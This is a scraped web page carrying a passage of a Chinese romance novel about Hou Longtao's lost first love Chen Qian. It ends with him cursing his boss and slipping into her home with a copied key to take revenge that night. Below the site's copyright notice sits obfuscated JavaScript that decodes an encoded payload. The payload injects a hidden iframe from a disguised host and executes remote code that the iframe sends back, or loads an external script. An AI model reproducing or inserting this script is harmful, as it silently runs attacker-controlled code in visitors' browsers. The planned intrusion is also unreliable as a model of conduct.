觉的有责任好好保护他心爱的女孩。可他没想到,往后的七年里,他再也见不到 这个让他牵肠挂肚的美人了…没几天就开学了,侯龙涛一下就被高三的复习所淹没了,虽然他是个小痞子, 却对父母很孝顺。两人又对他有很大的期望,他也就只能拼命的学习了。知道陈 倩高中上的是崇文门中学的空服人员培训班,可怎么也没时间去找她,只能给她 写信了。一连十几封信都没有回音,侯龙涛也本能的感到不太妙,可陈倩的那句话始 终让他相信两人是有未来的。两个月后,终于收到了一封回信,看着信封上娟秀 的字迹,他兴奋的心情是别人无法想象的。“我现在过的很开心,不想要男朋友,你明白我的意思吧…”白纸黑字…当时侯龙涛正忙于高考,没时间照料他那颗破碎的心,也就没感到很痛苦。 等上了大学,那就像是进了游乐场,天天就是跟一帮同学到处玩闹。他甚至觉的 一个固定的女朋友会成为他快乐时光的障碍。在那三年里,侯龙涛从没再想到过 陈倩,他又变回了一只小蜜蜂,不相信真爱的存在。他完全忘记陈倩了,至少他 觉的是,直到…侯龙涛踏上了飞往美国的航班。因为要在上海出关,飞机先得在虹桥机场降 落。着陆的时候,他感到有点不对,滑行的速度太快了。机舱里的乘客们在摇动, 红灯在闪烁,他看见有浓烟从引擎里冒出来(实际上那是由于轮胎和地面磨擦而 造成的,但那时候他可不知道)。侯龙涛想,就这样了,他的时刻到了,因为他就坐在右机翼边上。如果引擎 爆炸的话,他肯定是最先飞上天的。飞机最终在冲出跑道后停了下来,离前轮五 米的地方有一道防火沟。要是那飞机再晚停几秒,他就再也不用去美国了。在飞机上的时候,当那些氧气罩从机舱顶弹出的一刻,侯龙涛真的是热泪盈 眶,但那些眼泪不是因为对死亡的恐惧而流的。不是说他不怕死,在生死一线的 时刻,根本就没时间害怕。一种极端的悲哀让他不得不哭泣。一瞬间,他想起了陈倩,以为再也没有机会见她了,那种感觉让他比死还难 过。侯龙涛终于明白了,他从来也没有忘记那个女孩,她只是藏起来了,藏在男 人心灵的最深处。侯龙涛仍然深爱着陈倩。他真的知道什么是爱吗?当一个男人在死亡面前,唯一能想到的就是那个三年内从没想起过一次的女 孩,这是爱吗?他认为是。侯龙涛惊奇的发现他有生以来第一次想要和一个女孩 一起渡过他的余生。不知道应该感谢上天让他明白了他的真实感情,还是该恨他让他的生活变的 毫无快乐可言。在美国上学的前两年里,没有一天不是在对陈倩的思念中渡过的。他知道单 相思是不会有结果的,所以也试过一些方法,去了chinaren的校友录,但初中里 没她,高中连她的班级都没有;让文龙问王丽怎样才能找到她,可文龙没把这当 回事,可能是因为他根本就不信侯龙涛会真的爱一个女孩;虽然侯龙涛每年都会 回国一次,但想在短短的一个半月间在一个人口上千万的城市里找一个人谈何容 易。他只好天天都疯狂的学习,争取早日完成学业,好回国专心的寻找梦中的女 孩。他不在乎那会让他花多少时间、精力、金钱。唯一让他困惑的是,虽然希望 渺茫,但如果他真的找到陈倩时,她已是别人的妻子了,那他该怎么办?他的良 心不容许他破坏别人的家庭(也不知道他有没有那个能力。),但要他忘掉陈倩, 更是做不到。后来宝丁从警院毕业,进了派出所,帮侯龙涛查到了所有于二十二年前出生 在北京的叫陈倩的女孩的地址。侯龙涛写了一封长信,把对陈倩的感情和思念全 写在了里面,发给每个人,希望上天能看在他一片诚心的份上,让奇迹发生一次。侯龙涛知道陈倩八成已经有了男朋友,更不敢奢望光凭一封信就让她接受自 己,但他真的不能再忍受不知道陈倩身在何处,生活的如何了。又是一年过去了,发出的信件如同石沉大海,真是让他伤心欲绝。后来又发 生了一件事(不是中奖。),使他再次变回了一个花花公子…“先生,我有什么能帮你的吗?”女人娇美的声音将侯龙涛拉回了现实中, 面前的女人分明就是陈倩,个子长高了,身体也成熟了,可那张美伦美奂的脸庞 除了增加了几分妩媚,一点没有变。“你…你不认的我了?”“侯龙涛…”女人小声的说。“你没收到我的信吗?” “收到了…”陈倩躲开男人的眼光,“我有什么能帮你的吗?”“她收到我的信了,但她选择不给我回,七年前是这样,七年后还是这样, 这个女人的心里跟本没有我。”侯龙涛的心里好乱,平时的灵牙利齿、出口成章 的本事都笑去无踪。他一转身,在人们能看到他眼里的泪水之前,冲出了营业厅 …闭着眼睛在车里坐了两个多小时,仍然不能平静下来。虽说薛诺、茹嫣和月 玲长的都不比陈倩差,可第一个爱上的女人在人在男人心里永远都是最美的。手机响起,“喂。”侯龙涛的声音还有些颤抖。“侯经理,你在干什么?请 你马上到公司来,我们已经等了你十分钟了。”听到许如云严厉的声音,才想起 今早她要向各部门主管传达总公司的指示。“侯龙涛,现在不是儿女情长的时候,还有一件大事要办呢。”侯龙涛强迫 自己暂时不再想陈倩,向国贸开去…第九章 柳暗花明(上)到了公司,自是免不了被当众大骂。“臭婊子,让你再嚣张一天,过了今晚,看咱们谁是谁主子。”狠刀刀的暗骂着,突然看到月玲脸上第一次出现了对许如云不满的表情,心里也不由的一甜,还是有女人爱自己的。离下班时间还有两小时的时候,侯龙涛就借故离开了。在外面简单的吃了点东西,拿着月玲给他配的钥匙,到了四环边的一片涉外公寓区。许如云的房子是一幢二层的小洋楼,很漂亮。把车停的远远的,提着一个皮包从前门大摇大摆的进入室内。不到三分钟
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}